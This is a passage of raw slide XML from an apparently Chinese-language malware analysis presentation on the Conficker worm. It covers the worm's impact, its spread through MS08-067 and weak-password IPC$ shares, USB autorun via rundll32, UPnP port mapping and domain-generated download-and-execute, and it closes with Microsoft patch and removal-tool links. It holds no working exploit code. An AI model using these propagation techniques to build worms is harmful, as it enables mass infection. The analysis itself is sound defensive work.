            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="图片18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A55027AA-1561-44DE-84B9-509DD94B0B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9" y="2640564"/>
            <a:ext cx="9906116" cy="124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C4D6E1-DF51-4584-8C70-06C73F2AD986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415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09EA1A-D50A-4403-A78C-5428AD9191F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="675421" y="895582"/>
            <a:ext cx="901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设置以下注册表键值：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>HKLM\SYSTEM\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>CurrentControlSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>\Services\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Tcpip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>\Parameters\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>TcpNumConnections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> = 0x00FFFFFE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C45B3A-58EB-445A-896E-6F7E2B8C4E5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="675421" y="3865017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注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>svchost.exe -k </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>NetWorkService</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9" descr="图片16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D651F172-2922-47D5-B80B-0D3C31D4E5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3" y="2095911"/>
            <a:ext cx="9928825" cy="135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图片17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34DC2059-6F89-4AD8-8AAA-6534E556E4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3" y="4991878"/>
            <a:ext cx="9999572" cy="58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61A92F-5680-4B48-920D-7702ED036CFD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09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关键传播和主要功能位置</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11" descr="图片19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11FDA6D4-FF47-41E6-9F84-08796D6489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7" y="2311569"/>
            <a:ext cx="9906116" cy="35670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D01EBC-BCC6-4912-A986-9779333034A4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1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10589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①随机监听一个端口，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>MS08-067</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>漏洞利用成功后向目标主机发送蠕虫自身来传播</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="图片20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18F4659C-CBE0-4827-9DDE-419F92DFD0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8" y="2118049"/>
            <a:ext cx="10082911" cy="181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860D59-BB46-4C60-B0BE-60CB292DF1B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755390" y="4252040"/>
            <a:ext cx="280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MS08-067</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>漏洞利用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="图片21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C13182D3-CA96-4A35-ABDF-7618A4157F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8" y="4941040"/>
            <a:ext cx="10062574" cy="1072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D49FD1-4E8A-407C-86DA-BDA2BF42258E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2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10589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call 009BA799</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>中</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="图片22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79895F27-6223-4EAB-B164-C4058B29D3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91" y="742260"/>
            <a:ext cx="8470382" cy="384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图片23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A6AE1A1-D1E6-4476-8124-3518542615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91" y="4930354"/>
            <a:ext cx="8503759" cy="15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C2458B-C3DF-4A3D-998B-5E61FAB346C7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07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10589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call 009BA8E9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>中</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="图片24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1252A326-1606-4611-AFC8-82EF5AABC3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22" y="1800808"/>
            <a:ext cx="9863367" cy="111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25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6D7225F-2F0F-49C1-B74D-C42C69CACF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22" y="3763162"/>
            <a:ext cx="10463211" cy="11186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C75FAD-98B7-4A04-9A5E-066245CA03C5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4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一、介绍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911425" y="1304035"/>
            <a:ext cx="1017334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Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>主要影响</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>一个法国士兵便是在家使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>盘中了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，随后法国海军内网被大面积感染那。军方不得已切断了所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>与电邮系统，部分战机的起飞计划也被突然叫停。随后英国，德国的军事系统也爆出大面积感染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蠕虫的消息，其传播能力与影响力可见一斑。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>英国议会</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>系统被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感染，导致含糊被锁定以及整体网络运行速度降低。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>大闹牛津大学</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>微软悬赏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>25</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>万美元寻找该病毒制作者线索。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Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>传播途径</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>操作系统已知的一个服务的缓冲区漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(MS08-067)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>局域网内查询共享，暴力猜测密码，进行共享传播</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>发现移动设备后写入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>AutoRun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，借助移动设备进行传播。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1351386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10589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②遍历弱密码表用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IPC$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>网络共享方式传播</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="图片26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{776915AF-7BAF-4C65-8974-423372FD00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1547629"/>
            <a:ext cx="9797869" cy="32659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47B180-60F9-4BFA-9DBA-5C8073BA94AD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70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672127" y="1085964"/>
            <a:ext cx="10589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弱密码表</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="图片27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A4DE919-1CF9-4B69-B0DF-9BD69F1735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0" y="1085964"/>
            <a:ext cx="8490178" cy="52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604F49-BEA1-47F3-B0A4-B561BB17B3CF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18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429531" y="751344"/>
            <a:ext cx="105899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③感染移动设备</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>复制自身到下面路径，并写入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>autorun.inf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，让其一插入就以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>rundll32.exe xx.dll,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>参数 形式执行蠕虫</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&lt;drive&gt;\RECYCLER\S-%d-%d-%d-%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-%d\&lt;random filename and extension &gt;”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>autorun.inf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文件有混淆，主要内容是以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>rundll32.exe \RECYCLER\S-%d-%d-%d-%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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>d%d%d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>-%d\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>xxx.dll,pmiyvbu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>来执行文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="图片28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73595F18-EAA4-4369-B821-7F94F339D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47" y="3359297"/>
            <a:ext cx="8788853" cy="3406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E62867-96BC-4AE6-BCD8-44B9AC6C5CE4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51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429531" y="751344"/>
            <a:ext cx="2378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④网关相关</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>找支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>UPnP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的网关来动态映射端口</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="图片29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43D733C2-6980-47E4-9248-8FFBE6D342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33" y="37554"/>
            <a:ext cx="9100328" cy="401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图片30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FD7964E-D954-494E-AA4F-88D1FB627C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52" y="4679105"/>
            <a:ext cx="8871409" cy="20426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D5B9F0-70A0-43DC-AFB7-90B324554327}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429530" y="5284919"/>
            <a:ext cx="2378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然后通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>控制打开端口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D1A05-2078-4535-AEAE-40A81F39F44E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58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C68EF2-FAC5-4262-8721-110BE7B8098D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429531" y="751344"/>
            <a:ext cx="1010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⑤判断时间，访问随机生成的域名，下载并执行文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>查询本地和网络时间</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="图片31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FA2F8BB-C062-4AB6-85AD-E2CEBA26B5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9" y="1679126"/>
            <a:ext cx="9184251" cy="276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0EC1C7-7D9C-4AC0-9FEF-927E1054DEFD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308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D5B9F0-70A0-43DC-AFB7-90B324554327}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392209" y="865362"/>
            <a:ext cx="2378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域名产生算法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="图片32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D734E08-F55F-49FF-A067-23930EDE21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7" y="1982555"/>
            <a:ext cx="10124406" cy="3491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72893C-5428-49DA-B4F6-D2277FD28D40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2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D5B9F0-70A0-43DC-AFB7-90B324554327}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="344682" y="4107395"/>
            <a:ext cx="10081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会检查文件的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>HASH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，通过检查后创建线程来执行下载来的文件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13741" y="97283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下载并执行文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9" descr="图片33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0908EC6-5ED5-467C-82FC-9570E369DA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49" y="1495183"/>
            <a:ext cx="10738902" cy="209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34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{462DFA94-30F2-46CA-888E-C1FFEBE866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49" y="4743925"/>
            <a:ext cx="10607405" cy="1386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7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六、恶意样本处理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41733" y="1140783"/>
            <a:ext cx="107271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清除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>蠕虫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>1(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>此方法适用于普通网民</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>下载最新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免疫补丁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>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.microsoft.com/downloads/details.aspx?display&amp;FamilyID=0d5f9b6e-9265-44b9-a376-2067b73d6a03</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>支持的操作系统：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>WindowsXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> Service Pack 2; Windows XP Service Pack 3</a:t>
            </a:r>
          </a:p>
          <a:p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en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.microsoft.com/downloads/details.aspx?display&amp;FamilyID=f26d395d-2459-4e40-8c92-3de1c52c390d</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>支持的操作系统： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Server 2003 Service Pack 1; Windows Server 2003 Service Pack 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="109396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六、恶意样本处理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444370" y="1066138"/>
            <a:ext cx="1072715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2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>打好补丁后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>MSRT(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.microsoft.com/downloads/details.aspx?display&amp;FamilyID=ad724ae0-e72d-4f54-9ab3-75b8eb148356</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>进行清除企业环境中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>MSRT(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://support.microsoft.com/?kbid=891716</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的部署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Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>蠕虫清除工具下载</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>--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蠕虫专杀工具</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://support.microsoft.com/kb/890830(Windows2000/XP/2003/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>其他恶意软件删除工具下载</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://support.microsoft.com/kb/891716</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>繁体中文（香港、澳门和台湾）用户，请参考微软官方网站提供的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蠕蟲惡意軟體移除工具。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18634C-8096-432A-9139-0ABCB4185106}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="444370" y="5545000"/>
            <a:ext cx="10727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3:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>如果还是杀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>win32.conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>木马病毒的话</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>可到</a:t>
            </a:r>
            <a:r>
